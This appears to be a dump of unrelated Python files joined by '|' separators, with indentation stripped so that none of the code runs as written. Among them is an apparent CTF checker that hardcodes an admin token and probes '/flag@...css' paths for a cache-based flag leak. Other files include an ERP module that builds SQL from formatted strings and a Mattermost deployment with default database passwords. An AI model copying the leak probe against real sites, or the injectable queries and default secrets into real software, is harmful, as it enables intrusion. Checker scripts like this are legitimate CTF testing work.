from copy import deepcopy
from tag_manager import TagMgr
logging.basicConfig(level='INFO')
fh = logging.FileHandler('/archive/customize-target.log')
fh.setFormatter(logging.getLogger().handlers[0].formatter)
logging.getLogger().addHandler(fh)
def git_hash(gitdir):
return subprocess.check_output(
['git', 'log', '-1', '--format=%H'], cwd=gitdir
).strip().decode()
def targets_from_api(factory):
""" When we are called to create the installed_targets file, we'll
We need to get the targets from the API so that we can help find the
current docker-apps.
"""
url = 'https://api.foundries.io/ota/repo/'
url += factory
url += '/api/v1/user_repo/targets.json'
try:
with open('/secrets/osftok') as f:
token = f.read().strip()
except FileNotFoundError:
logging.warning('osftok not found, assuming a simulator build')
return {}
req = urllib.request.Request(url, headers={'OSF-TOKEN': token})
with urllib.request.urlopen(req, timeout=15) as response:
data = json.load(response)
return data['signed']['targets']
def merge(targets_json, target_name, lmp_manifest_sha, arch, image_name,
machine, factory, ota_lite_tag, meta_subscriber_overrides_sha):
with open(targets_json) as f:
data = json.load(f)
changed = False
try:
targets = data['targets']
except KeyError:
logging.info('Assuming installed_versions file')
# have a dict: ostree-hash: target-name, convert to a target
name, version = target_name.rsplit('-', 1)
machine, _ = name.split('-lmp', 1)
data = {
v: {
'hashes': {'sha256': k},
'is_current': True,
'custom': {
'targetFormat': 'OSTREE',
'name': name,
'version': version,
'hardwareIds': [machine],
}
} for k, v in data.items()
}
targets = targets_from_api(factory)
targets.update(data)
changed = True
tagmgr = TagMgr(ota_lite_tag)
logging.info('Target is: %r', targets[target_name])
logging.info('Doing Target tagging for: %s', tagmgr)
updates = []
for idx, (tgt_tag, apps_tag) in enumerate(tagmgr.tags):
tgt = targets[args.target_name]
tgt['custom']['lmp-manifest-sha'] = lmp_manifest_sha
tgt['custom']['arch'] = arch
tgt['custom']['image-file'] = '{}-{}.wic.gz'.format(image_name, machine)
if meta_subscriber_overrides_sha:
tgt['custom']['meta-subscriber-overrides-sha'] = meta_subscriber_overrides_sha
if idx:
tgt = deepcopy(tgt)
targets[args.target_name + '-%d' % idx] = tgt
changed = True
if tgt_tag:
tgt['custom']['tags'] = [tgt_tag]
changed = True
updates.append({
'ver': int(tgt['custom']['version']),
'tag': apps_tag,
'tgt': tgt,
'prev': None,
})
# Now find the previous version of each target
for tgt in targets.values():
for cur in updates:
if tgt['custom'].get('name') == cur['tgt']['custom']['name']:
tag = cur['tag']
match_tag = not tag or tag in tgt['custom'].get('tags', [])
tgt_ver = int(tgt['custom']['version'])
prev_ver = 0
if cur['prev']:
prev_ver = int(cur['prev']['custom']['version'])
if match_tag and tgt_ver > prev_ver and tgt_ver < cur['ver']:
cur['prev'] = tgt
for u in updates:
if u['prev']:
logging.info('Prev is: %r', u['prev'])
apps = u['prev']['custom'].get('docker_compose_apps')
if apps:
logging.info('Updating build to have compose apps: %r', apps)
u['tgt']['custom']['docker_compose_apps'] = apps
sha = u['prev']['custom'].get('containers-sha')
if sha:
u['tgt']['custom']['containers-sha'] = sha
apps_uri = u['prev']['custom'].get('compose-apps-uri')
if apps_uri:
u['tgt']['custom']['compose-apps-uri'] = apps_uri
changed = True
if changed:
logging.info('Target has changed, saving changes')
with open(args.targets_json, 'w') as f:
json.dump(data, f, indent=2)
def get_args():
parser = argparse.ArgumentParser(
'''Do LMP customiziations of the current build target. Including
copying Compose Apps defined in the previous build target.''')
parser.add_argument('factory')
parser.add_argument('ota_lite_tag')
parser.add_argument('machine')
parser.add_argument('image_name')
parser.add_argument('image_arch')
parser.add_argument('targets_json')
parser.add_argument('target_name')
parser.add_argument('--manifest-repo',
default=os.environ.get('MANIFEST_REPO', '/srv/oe/.repo/manifests'))
parser.add_argument('--meta-sub-overrides-repo',
default=os.environ.get('META_SUB_OVERRIDES_REPO', '/srv/oe/layers/meta-subscriber-overrides'))
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
if os.path.exists(args.meta_sub_overrides_repo):
overrides_sha = git_hash(args.meta_sub_overrides_repo)
else:
logging.info("meta-subscriber-overrides layer/repo wasn't fetched")
overrides_sha = None
merge(args.targets_json, args.target_name, git_hash(args.manifest_repo),
args.image_arch, args.image_name, args.machine, args.factory,
args.ota_lite_tag, overrides_sha)
|
def ZG_rprod(X,Y):
if len(X.shape) < 2:
X = X[:,None]
n,m = X.shape
if Y.shape[0] != n or len(Y.shape) != 1:
print('rprod error')
return None
Y = Y[:,None]
Z = np.multiply(X,np.matmul(Y,np.ones((1,m))))
return Z
|
from typing import Any
from typing import Dict
from typing import List
from typing import NamedTuple
from typing import Optional
from typing import Type
from typing import Union
from pyannotate_runtime.collect_types import InternalType
from pyannotate_runtime.collect_types import resolve_type
from ntgen.config import Config
from ntgen.config import IS_PY_37_COMPATIBLE
from ntgen.utils import normalize_class_name
from ntgen.utils import normalize_field_name
class NT(NamedTuple):
"""
Contains meta data of a future NamedTuple definition.
The NT class contains meta data which may be rendered as a single or multiple NamedTuple definitions. An instance of the class
may be created using a direct class initialization or by parsing a dictionary using the parse_dict class method.
"""
attrs: List["Attribute"] # type: ignore
name: str
def __repr__(self) -> str:
"""Format the structure name to be a Pythonic class identifier."""
return normalize_class_name(self.name)
def repr_type_hint(self) -> str:
"""Return a string representing a type hint for the attribute."""
return f"'{repr(self)}'"
@property
def nt_attrs(self) -> List["Attribute"]:
"""Return a list of all the 'user defined' type attributes of the data structure."""
return [attr for attr in self.attrs if attr.is_user_defined]
@property
def builtin_type_attrs(self) -> List["Attribute"]:
"""Return a list of all the builtin type attributes in the data structure."""
return [attr for attr in self.attrs if not attr.is_user_defined]
@classmethod
def parse_dict(cls, data: Dict[str, Any], name: str, config: Config, level: int = 0) -> Optional["NT"]:
"""
Parse a given dictionary to identify future NamedTuple metadata.
:param data: dictionary to be parsed
:param name: name of the future NamedTuple
:param config: Config instance
:param level: prevents the method from creating too deeply-nested NamedTuple definitions
:return: An instance of the NT class if it's non-empty (i.e. it contains any attributes)
"""
if not isinstance(data, dict):
return None
should_nest = config.max_level is None or level < config.max_level
attrs = []
for attr_name, attr_value in data.items():
nt = NT.parse_dict(data=attr_value, name=attr_name, level=level + 1, config=config)
attribute_type = nt if nt and should_nest else resolve_type(attr_value)
attrs.append(Attribute(original_name=attr_name, type=attribute_type, value=attr_value))
return NT(attrs=attrs, name=name) if attrs else None
class Attribute(NamedTuple):
"""
A class representing metadata of a future NamedTuple definition attribute.
The class stores metadata about a NamedTuple attribute, namely:
- the attribute name
- inferred attribute type
- original value of the attribute used to infer the type
The attribute type may be one of:
- NoneType
- built-in types which cannot be parameterized such as str, int, float, etc.
- pyannotate type in case if the attribute will be rendered as a built-in parameterizable type, e.g. Dict[T,T], Tuple[T, int]
- NT object if the attribute will be rendered as a NamedTuple definition
"""
original_name: str
type: Union[InternalType, NT, Type[None]]
value: Any
@property
def repr_field_name(self) -> str:
"""Return the attribute name normalized to be a valid pythonic NamedTuple field name."""
return normalize_field_name(name=self.original_name, leading_undescores_prefix=None)
@property
def repr_type_hint(self) -> str:
"""Return a string representing a type hint for the attribute."""
if self.type is type(None): # noqa: E721 # there's no other way to check for NoneType
return "None"
if isinstance(self.type, type):
return self.type.__name__
if isinstance(self.type, NT) and not IS_PY_37_COMPATIBLE:
return f"'{repr(self.type)}'"
return repr(self.type)
@property
def is_user_defined(self) -> bool:
"""Return True if the attribute will be rendered as a user defined type (namely a NamedTuple)."""
return isinstance(self.type, NT)
|
def checkstr(arm):
count=0
arr1=[]
game=False
for k in range(len(arm)):
for m in range(k+1,len(arm)):
arr1.append(abs(arm[k]-arm[m]))
print(arr1)
for i in range(len(arr1)):
if arr1[i]>=max(arm):
count+=1
if count==((len(arm)*(len(arm)-1)//2)):
game=True
print(count)
return game
arm=[0]
if(checkstr(arm)):
print("yes") |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from config import gLocalIP
from config import gLocalPort
from config import gSaveDataFileFullName
from config import gFlyerInitDoneStr
from config import gKeyAcceletorPidStep
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUiType, loadUi
from widget.wave_widget import FCWaveWidget
# 协议帧
from frame.down import FCDownFrame, FCCtrlStartFrame, FCCtrlStopFrame
class FCOnlineWidget(QWidget):
sSendDownFrame = pyqtSignal(FCDownFrame, name = 'sSendDownFrame')
def __init__(self, uiFile):
super(FCOnlineWidget, self).__init__()
# 读取/设置ui文件
UIClass = loadUiType(uiFile)
self.mUi = UIClass[0]()
self.mUi.setupUi(self)
# 加入波形控件
self.mWaveWidget = FCWaveWidget()
self.mWaveGroupBox = self.mUi.waveGroupBox
vbox = QVBoxLayout()
vbox.addWidget(self.mWaveWidget)
self.mWaveGroupBox.setLayout(vbox)
# 基本配置
self.mIpLabel = self.mUi.ipLabel
self.mPortLabel = self.mUi.portLabel
self.mDataPathLabel = self.mUi.dataPathLabel
self.mIpLabel.setText("IP:" + str(gLocalIP))
self.mPortLabel.setText("端口:" + str(gLocalPort))
self.mDataPathLabel.setText("信息保存到:" + str(gSaveDataFileFullName))
# 控制台文本输出
self.mConsolePlainTextEdit = self.mUi.consolePlainTextEdit
# 采样帧控制
# 采样间隔
self.mIntervalLineEdit = self.mUi.intervalLineEdit
# 油门控制
self.mAcceleratorSpinBox = self.mUi.acceleratorSpinBox
self.mStartPushButton = self.mUi.startPushButton
self.mStopPushButton = self.mUi.stopPushButton
self.mStartPushButton.clicked.connect(self.Start)
self.mStopPushButton.clicked.connect(self.Stop)
# 实时信息控件
self.mRunTimeLabel = self.mUi.runTimeLabel
self.mThetaLabel = self.mUi.thetaLabel
self.mPhiLabel = self.mUi.phiLabel
self.mPsiLabel = self.mUi.psiLabel
# 为按键事件准备焦点策略
self.setFocusPolicy(Qt.StrongFocus)
# 记录采样帧数
self.frame_count = 0
def closeEvent(self, event):
super(FCOnlineWidget, self).closeEvent(event)
def Capture(self, downFrameClass):
self.mIntervalLineEdit.setEnabled(False)
interval = int(self.mIntervalLineEdit.text())
downFrame = downFrameClass(interval)
self.SendDownFrame(downFrame)
def Start(self):
accelerator = int(self.mAcceleratorSpinBox.text())
downFrame = FCCtrlStartFrame(accelerator)
self.SendDownFrame(downFrame)
def Stop(self):
downFrame = FCCtrlStopFrame()
self.SendDownFrame(downFrame)
def SendDownFrame(self, frame):
self.sSendDownFrame.emit(frame)
def RecvNewUpFrame(self, frame):
(tick, frameDict) = frame.ToFrameDict()
if frameDict['文本']:
text = '[%05d]:%s' % (tick, frameDict['文本'])
# 等效于 append 但是不加入换行
self.mConsolePlainTextEdit.moveCursor(QTextCursor.End)
self.mConsolePlainTextEdit.insertPlainText(text)
self.mConsolePlainTextEdit.moveCursor(QTextCursor.End)
# 下位机就绪后发送采用信号
text = frameDict['文本']
if gFlyerInitDoneStr in text:
self.Capture()
else:
print("采样帧数:%d" % self.frame_count)
self.frame_count += 1
label_str = '运行:% 6.1fs' % (1.0 * tick / 1000)
self.mRunTimeLabel.setText(label_str)
euler = frameDict['欧拉角']
if euler:
label_str = '俯仰:%+6.1f' % euler['俯仰角']
self.mThetaLabel.setText(label_str)
label_str = '横滚:%+6.1f' % euler['横滚角']
self.mPhiLabel.setText(label_str)
label_str = '偏航:%+6.1f' % euler['偏航角']
self.mPsiLabel.setText(label_str)
# 将数据帧加入波形控件(波形控件自己会绘制)
self.mWaveWidget.Append(tick, frameDict)
# 交互类函数
def keyPressEvent(self, keyEvent):
key = keyEvent.key()
# 加油
if Qt.Key_W == key:
accelerator = int(self.mAcceleratorSpinBox.text())
accelerator += gKeyAcceletorPidStep
self.mAcceleratorSpinBox.setValue(accelerator)
self.Start()
# 减油
elif Qt.Key_S == key:
accelerator = int(self.mAcceleratorSpinBox.text())
accelerator -= gKeyAcceletorPidStep
self.mAcceleratorSpinBox.setValue(accelerator)
self.Start()
# 按照mAcceleratorSpinBox值启动
elif Qt.Key_Enter == key or Qt.Key_Return == key:
self.Start()
# 刹车
elif Qt.Key_Space == key:
self.Stop()
# 无用按键
else:
pass
|
from tabulate import tabulate
class RoutesTable(object):
def __init__(self,initRoutes, localHost):
self.__host = localHost
self.__table = initRoutes
self.__table.append([localHost,localHost,0])
# mockHost = '224.0.0.1'
self.__table.append(["192.168.199.101", "192.168.199.134", 2])
self.__change = False
# print('routeTable host: ', self.__host, flush=True)
def isTableEmpty(self):
return self.__table == []
def print(self):
print("The router({}) routeTable: ".format(self.__host), flush=True)
if self.isTableEmpty():
print('No routes', flush=True)
else:
# print('__table: ', self.__table, flush=True)
print(tabulate(self.__table, headers=['target', 'next hop', 'metric'], tablefmt='orgbl'), end='\n\n', flush=True)
def updateRoute(self, route, remoteHost):
if self.isTableEmpty():
route[1] = remoteHost
self.__table.append(route)
self.change = True
else:
change = False
isFound = False
for localRouteItem in self.__table:
# 避免路由环路
if route[0] == self.__host:
print("[updateRouteFunc]same host: ", route[0] ,flush=True)
return
elif localRouteItem[0] == route[0]:
isFound = True
if localRouteItem[2] > route[2] + 1:
localRouteItem[2] = route[2] + 1
localRouteItem[1] = remoteHost
change = True
print("[updateRouteFunc]found condition: ",localRouteItem,flush=True)
break
if not isFound:
self.__table.append([route[0], remoteHost, route[2] + 1])
print('[updateRouteFunc]not found condition: ',self.__table[-1],flush=True)
change = True
self.__change = change
print("[updateRouteFunc] finish", flush=True)
def updateRouteTable(self, routesTable, remoteHost):
for route in routesTable:
self.updateRoute(route, remoteHost)
print("updateRouteTable", flush=True)
self.print()
def poisonRoute(self, remoteHost):
for route in self.__table:
if route[1] == remoteHost:
# As rip protocol show , it means that it is unreachable when a remotehost metric is set to 16
route[2] = 16
def getTable(self):
return self.__table[:]
def getHost(self):
return self.__host
def setHost(self, host):
self.__host = host
def isChangeLastest(self):
return self.__change
def formatRouteTables(routesTable):
print(tabulate(routesTable, headers=['target', 'next hop', 'metric'], tablefmt='orgbl'), end='\n\n', flush=True)
# a = routeTable("127.0.0.1")
# b = routeTable("127.0.0.2")
# a.updateRoute(["127.0.0.3", "127.0.0.2", 2])
# a.print()
# b.updateRoute(["127.0.0.3","127.0.0.3",1])
# b.updateRouteTable(a.getTable())
# b.print()
# def RIPadvertise(ip):
|
import random
from requests import *
ADMIN_TOKEN = "CroRQgDwMmJdybKa"
def check(host):
s = session()
# index
result = get(f"http://{host}/index")
if b"/flag" not in result.content:
return 0, "Dead"
result = get(f"http://{host}/flag@3gh3ugh4m.css")
if b"we{" in result.content:
return 0, "Flag Leak 1 "
result = get(f"http://{host}/flag")
if b"we{" in result.content:
return 0, "Flag Leak 2"
result = get(f"http://{host}/flag@ufh48fk32.css", cookies={
"token": ADMIN_TOKEN
})
if b"we{" not in result.content:
return 0, "No Flag"
result = get(f"http://{host}/flag@ufh48fk32.css")
if b"we{" not in result.content:
return 0, "Cant pwn"
return 1, ""
FUNCTIONS = [check]
if __name__ == "__main__":
print(check("172.17.0.2:1006"))
|
# !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = 'CVtek dev'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "CVTek dev"
__status__ = "Development"
__model_name__ = 'resumo_iva.ResumoIva'
import auth, base_models
from orm import *
from form import *
'''
try:
from my_plano_contas import PlanoContas
except:
from plano_contas import PlanoContas
'''
try:
from my_factura_cli import FacturaCliente
except:
from factura_cli import FacturaCliente
try:
from my_factura_forn import FacturaFornecedor
except:
from factura_forn import FacturaFornecedor
class ResumoIva(Model, View):
def __init__(self, **kargs):
#depois por aqui entre datas e só de um diario ou periodo, etc, etc.
Model.__init__(self, **kargs)
self.__name__ = 'resumo_iva'
self.__title__ = 'Resumo do IVA'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
#self.__db_mode__ = 'None'
self.__workflow__ = (
'estado', {'Rascunho':['Gerar'],'Gerado':['Imprimir', 'Exportar']}
)
self.__workflow_auth__ = {
'Gerar':['All'],
'Imprimir':['All'],
'Exportar':['All'],
'full_access':['Gestor']
}
self.__auth__ = {
'read':['All'],
'write':['All'],
'create':['All'],
'delete':['Gestor'],
'full_access':['Gestor']
}
self.data_inicial = date_field(view_order=1, name='Data Inicial', default=datetime.date(datetime.date.today().year,datetime.date.today().month,int(1)))
self.data_final = date_field(view_order=2, name='Data Final', default=datetime.date.today())
self.iva_pagar = string_field(view_order=3, name='IVA a Pagar')
self.iva_receber = string_field(view_order=4, name='IVA a Receber')
self.estado = info_field(view_order=5, name='Estado', hidden=True, default='Rascunho')
def get_total_a_pagar(self, data_inicial, data_final):
total_iva=0
facturas = FacturaCliente(where="data>='{inicio}' AND data <='{fim}' AND estado ='Confirmado'".format(inicio=data_inicial,fim=data_final)).get()
if len(facturas)!= 0:
for line in facturas:
total_iva+=int(line['total_iva'])
return total_iva
def get_total_a_receber(self, data_inicial, data_final):
total_iva=0
facturas = FacturaFornecedor(where="data>='{inicio}' AND data <='{fim}' AND estado ='Confirmado'".format(inicio=data_inicial,fim=data_final)).get()
if len(facturas)!= 0:
for line in facturas:
total_iva += int(FacturaFornecedor().get_total_iva(key=line['id']))
return total_iva
def Gerar(self, key, window_id):
self.kargs = get_model_record(model=self, key=key)
self.kargs['iva_pagar']=str(self.get_total_a_pagar(data_inicial=self.kargs['data_inicial'], data_final=self.kargs['data_final']))
self.kargs['iva_receber']=str(self.get_total_a_receber(data_inicial=self.kargs['data_inicial'], data_final=self.kargs['data_final']))
self.kargs['estado']='Gerado'
self.put()
return form_edit(window_id = window_id).show()
def Imprimir(self, key, window_id):
print('estou no imprimir do resumo iva')
template = 'resumo_iva'
#record = self.prepare_data()
return Report(record=record, report_template=template).show()
def Exportar(self, key, window_id):
print('estou na função de Exportar no balancete')
result = self.prepare_data()['lines']
#print('result: ', result)
return data_to_csv(data=result, model=self, text='Gravar', cols=['codigo', 'conta', 'debito', 'credito', 'saldo'])
|
import unittest
from mbi.factor import Factor
from mbi.domain import Domain
import numpy as np
class TestFactor(unittest.TestCase):
def setUp(self):
attrs = ['a','b','c']
shape = [2,3,4]
domain = Domain(attrs, shape)
values = np.random.rand(*shape)
self.factor = Factor(domain, values)
def test_expand(self):
domain = Domain(['a','b','c','d'], [2,3,4,5])
res = self.factor.expand(domain)
self.assertEqual(res.domain, domain)
self.assertEqual(res.values.shape, domain.shape)
res = res.sum(['d']) * 0.2
self.assertTrue(np.allclose(res.values, self.factor.values))
def test_transpose(self):
attrs = ['b','c','a']
tr = self.factor.transpose(attrs)
ans = Domain(attrs, [3,4,2])
self.assertEqual(tr.domain, ans)
def test_project(self):
res = self.factor.project(['c','a'], agg='sum')
ans = Domain(['c','a'], [4,2])
self.assertEqual(res.domain, ans)
self.assertEqual(res.values.shape, (4,2))
res = self.factor.project(['c','a'], agg='logsumexp')
self.assertEqual(res.domain, ans)
self.assertEqual(res.values.shape, (4,2))
def test_sum(self):
res = self.factor.sum(['a','b'])
self.assertEqual(res.domain, Domain(['c'],[4]))
self.assertTrue(np.allclose(res.values, self.factor.values.sum(axis=(0,1))))
def test_logsumexp(self):
res = self.factor.logsumexp(['a','c'])
values = self.factor.values
ans = np.log(np.sum(np.exp(values), axis=(0,2)))
self.assertEqual(res.domain, Domain(['b'],[3]))
self.assertTrue(np.allclose(res.values, ans))
def test_binary(self):
dom = Domain(['b','d','e'], [3,5,6])
vals = np.random.rand(3,5,6)
factor = Factor(dom, vals)
res = self.factor * factor
ans = Domain(['a','b','c','d','e'], [2,3,4,5,6])
self.assertEqual(res.domain, ans)
res = self.factor + factor
self.assertEqual(res.domain, ans)
res = self.factor * 2.0
self.assertEqual(res.domain, self.factor.domain)
res = self.factor + 2.0
self.assertEqual(res.domain, self.factor.domain)
res = self.factor - 2.0
self.assertEqual(res.domain, self.factor.domain)
res = self.factor.exp().log()
self.assertEqual(res.domain, self.factor.domain)
self.assertTrue(np.allclose(res.values, self.factor.values))
if __name__ == '__main__':
unittest.main()
|
import logging
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class ExistRecordCheckOperator(BaseOperator):
@apply_defaults
def __init__(self, redshift_conn_id="", tables=[], *args, **kwargs):
super(ExistRecordCheckOperator, self).__init__(*args, **kwargs)
self.tables = tables
self.redshift_conn_id = redshift_conn_id
def execute(self, context):
redshift_hook = PostgresHook(self.redshift_conn_id)
for table in self.tables:
records = redshift_hook.get_records(f"SELECT COUNT(*) FROM {table}")
if len(records) < 1 or len(records[0]) < 1:
raise ValueError(f"{table}: Data quality check failed. Returned no records")
num_records = records[0][0]
if num_records < 1:
raise ValueError(f"{table}: Data quality check failed. Contained 0 rows")
logging.info(f"{table}: Data quality check passed with {records[0][0]} records")
|
import pytest
from pygears.typing import Queue, TemplateArgumentsError, Uint
def test_inheritance():
assert Queue[1].base is Queue
def test_default():
a = Queue[2]
assert a.args[1] == 1
b = Queue[2, 6]
assert b.args[1] == 6
def test_equality():
assert Queue[1] == Queue[1]
assert Queue[1] == Queue[1, 1]
assert Queue[1, 2] != Queue[1, 3]
assert Queue[1, 2] == Queue[1, 2]
def test_repr():
a = Queue['T1', 3]
assert repr(a) == "Queue['T1', 3]"
def test_str():
a = Queue['T1', 3]
assert str(a) == "[T1]^3"
def test_is_specified():
assert Queue[1].specified is True
assert Queue['T1'].specified is False
assert Queue[Uint['T2']].specified is False
assert Queue[Uint[1]].specified is True
def test_subs():
a = Queue['T1']
b = a[1]
assert b == Queue[1]
def test_multilevel_subs():
a = Queue[Uint['T1']]
b = a[1]
assert b == Queue[Uint[1]]
@pytest.mark.xfail(raises=TemplateArgumentsError)
def test_excessive_subs():
a = Queue[Uint['T1']]
a[1, 2]
def test_indexing():
a = Queue[Uint[10]]
assert a[0] == Uint[10]
assert a[1] == Uint[1]
data, eot = a
assert data == a[0]
assert eot == a[1]
def test_queue_of_queues():
assert Queue[Queue[Uint[2], 2], 3] == Queue[Uint[2], 5]
|
from Crypto.PublicKey import RSA
key = RSA.generate(2048)
private_key = key.export_key()
file_out = open("pass_private.pem", "wb")
file_out.write(private_key)
public_key = key.publickey().export_key()
file_out = open("pass_public.pem", "wb")
file_out.write(public_key) |
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: Albert Berenguel
## Computer Vision Center (CVC). Universitat Autonoma de Barcelona
## Email: aberenguel@cvc.uab.es
## Copyright (c) 2017
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import torch
import torch.nn as nn
import importlib
import pickle
class SimpleEmbedding():
def __init__(self, opt):
self.opt = opt # Store the parameters
self.buildModels(self.opt)
self.setCuda()
# Build F and G models
def buildModels(self,opt):
modelF = importlib.import_module(opt['learner']).build(opt)
self.embedNetF = modelF.net # F function
modelG = importlib.import_module(opt['learner']).build(opt)
self.embedNetG = modelG.net # G function
# Build list of parameters for optim
def parameters(self):
# TODO: why in the original code creates a dictionary with the same
# parameters. model.params = {f=paramsG, g=paramsG}
return list(self.embedNetG.parameters()) + list(self.embedNetG.parameters())
# Set training or evaluation mode
def set(self,mode):
if mode == 'training':
self.embedNetF.train()
self.embedNetG.train()
elif mode == 'evaluate':
self.embedNetF.eval()
self.embedNetG.eval()
else:
print('model.set: undefined mode - %s' % (mode))
def isTraining(self):
return self.embedNetF.training
def default(self, dfDefault):
self.df = dfDefault
def embedF(self, input, g = [], K = []):
return self.embedNetF(input)
def embedG(self, input):
return self.embedNetG(input)
def save(self, path = './data'):
# Save the opt parameters
optParametersFile = open(os.path.join(path,'SimpleEmbedding_opt.pkl'), 'wb')
pickle.dump(self.opt, optParametersFile)
optParametersFile.close()
# Clean not needed data of the models
self.embedNetF.clearState()
self.embedNetG.clearState()
torch.save(self.embedNetF.state_dict(), os.path.join(path,'embedNetF.pth.tar'))
torch.save(self.embedNetG.state_dict(), os.path.join(path, 'embedNetG.pth.tar'))
def load(self, pathParams, pathModelF, pathModelG):
# Load opt parameters 'SimpleEmbedding_opt.pkl'
optParametersFile = open(pathParams, 'rb')
self.opt = pickle.load(optParametersFile)
optParametersFile.close()
# build the models
self.buildModels(self.opt)
# Load the weights and biases of F and G
checkpoint = torch.load(pathModelF)
self.embedNetF.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(pathModelG)
self.embedNetG.load_state_dict(checkpoint['state_dict'])
# Set cuda
self.setCuda()
def setCuda(self, value = 'default'):
# If value is a string then use self.opt
# If it is not a string then it should be True or False
if type(value) == str:
value = self.opt['useCUDA']
else:
assert(type(value)==bool)
if value == True:
print('Check CUDA')
self.embedNetF.cuda()
self.embedNetG.cuda()
else:
self.embedNetF.cpu()
self.embedNetG.cpu()
def build(opt):
model = SimpleEmbedding(opt)
return model
|
from jumpscale.sals.chatflows.chatflows import chatflow_step
from jumpscale.packages.vdc_dashboard.sals.solutions_chatflow import SolutionsChatflowDeploy
class MattermostDeploy(SolutionsChatflowDeploy):
SOLUTION_TYPE = "mattermost"
title = "Mattermost"
HELM_REPO_NAME = "marketplace"
steps = [
"init_chatflow",
"get_release_name",
"choose_flavor",
"set_config",
"create_subdomain",
"install_chart",
"initializing",
"success",
]
ADDITIONAL_QUERIES = [
{"cpu": 100, "memory": 256}, # mysql
{"cpu": 10, "memory": 10}, # initContainer.remove-lost-found
]
def get_config(self):
return {
"ingress.host": self.config.chart_config.domain,
"mysql.mysqlUser": self.config.chart_config.mysql_user,
"mysql.mysqlPassword": self.config.chart_config.mysql_password,
"mysql.mysqlRootPassword": self.config.chart_config.mysql_root_password,
}
@chatflow_step(title="Configurations")
def set_config(self):
form = self.new_form()
mysql_user = form.string_ask("Enter mysql user name", default="mysql", min_length=3, required=True,)
mysql_password = form.secret_ask(
"Enter mysql password", default="mySqlPassword", min_length=8, required=True,
) # TODO: need to check a valid password
mysql_root_password = form.secret_ask(
"Enter mysql password for root user", default="mySqlRootPassword", min_length=8, required=True,
) # TODO: need to check a valid password
form.ask()
self.config.chart_config.mysql_user = mysql_user.value
self.config.chart_config.mysql_password = mysql_password.value
self.config.chart_config.mysql_root_password = mysql_root_password.value
chat = MattermostDeploy
|
import numpy as np
from elephant.spike_train_generation import homogeneous_poisson_process
from quantities import Hz, s, ms
def square(xs):
return xs*xs
def function_task(f = square, min = -10, max = 10, step = 0.5):
"""
"""
xs = np.arange(start = min, stop = max, step = step)
ys = f(xs)
return xs, ys
def transform_to_log_domain_and_shift(ys):
"""Transform a data series into the log domain
by shifting it up by its minimum value and
taking the log.
"""
min_y = np.min(ys)
return np.log(1 + ys + min_y)
def network_input(ys, i, j):
"""
"""
return ys[i:j]
def generate_spiketrain_list(ys):
return [
homogeneous_poisson_process(rate=10.0*y*Hz, t_start=0.0*s, t_stop=100.0*s)
for y in ys]
def debug_spike_train(spiketrain_list, i, j):
import matplotlib.pyplot as plt
# plot horizontal bars and shade region between
# x_low and x_high
t = spiketrain_list[0].rescale(ms)
y_low = i * np.ones_like(t)
y_high = j * np.ones_like(t)
plt.fill_between(t, y_low, y_high)
for i, spiketrain in enumerate(spiketrain_list):
t = spiketrain.rescale(ms)
plt.plot(t, i * np.ones_like(t), 'k.', markersize=2)
plt.axis('tight')
plt.xlim(0, 1000)
plt.xlabel('Time (ms)', fontsize=16)
plt.ylabel('Spike Train Index', fontsize=16)
plt.gca().tick_params(axis='both', which='major', labelsize=14)
plt.show()
# http://elephant.readthedocs.io/en/latest/tutorial.html
# use to generate input
# and then use in spike_source_array
#debug_spike_train(spiketrain_list = generate_spiketrain_list(function_task()[1]), i=1, j=3) |
import exifread
from PIL import Image
def pil_verify(ifile):
try:
with Image.open(ifile) as im:
try:
im.verify()
return True
except Exception as e:
#print(e)
#print('Pil.Image.verify() failed: ' + ifile)
return False
# except OverflowError as e:
# print(e)
# print('Python int too large to convert to C long: Is this a PSD file: ' + afile)
# return False
except IOError:
#print('PIL cannot identify image file: ' + ifile)
# #testlog.write('> PIL cannot identify image file \n')
# #testlog.write('>' + ifile + '\n')
return False
# except Exception as e:
# print(e)
# print(ifile)
# print("Unexpected error doing PIL.Image.open():", sys.exc_info()[0] + 'File number ' + str(total_files))
# raise
def exif_test(ifile):
# test, tagscount, anydate
try:
with open(ifile, 'rb') as im:
tags = exifread.process_file(im, strict=True)
try:
anydate = any([True for i in tags if 'Date' in i])
except:
anydate = None
return True, tags, anydate
except Exception as e:
#print(e)
#print('Failed exif: ' + ifile)
return False, None, None
|
# -*- coding: utf-8 -*-
"""
/dms/elixier/views_show.py
.. zeigt Inhalte der Elixier-Datenbank
Django content Management System
Hans Rauch
hans.rauch@gmx.net
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.01 18.07.2007 Beginn der Arbeit
0.02 19.07.2007 Dispatcher
"""
from django.shortcuts import render_to_response
from django import newforms as forms
from django.utils.translation import ugettext as _
from dms.utils_form import get_item_vars_show
from dms.roles import require_permission
from dms.utils import show_link
from dms.views_error import show_error
from dms.elixier.views_statistik import views_statistik
from dms.elixier.views_beitraege import views_beitraege
from dms.elixier.views_beitraege import views_select_dest
# -----------------------------------------------------
@require_permission('perm_add')
def elixier_show(request,item_container):
""" zeigt Inhalte der Elixier-Datenbank an """
def get_section_view():
""" erzeugt die Section-Ansicht der im Ordner enthaltenen Objekte """
from django.template.loader import get_template
from django.template import Context
tSection = get_template('app/folder/section.html')
content = ''
# --- Daten
links = []
links.append(show_link(item_container.get_absolute_url() + '?elixier_op=fach_beitraege',
_(u'Fachbeiträge sichten')))
cSection = Context ( { 'section': _(u'Elixier-Daten'), 'links': links } )
content += tSection.render ( cSection)
# --- Statistik
links = []
links.append(show_link(item_container.get_absolute_url() + \
'?elixier_op=gesamt_statistik',
_(u'Elixier-Gesamtstatistik')))
links.append(show_link(item_container.get_absolute_url() + '?elixier_op=fach_statistik',
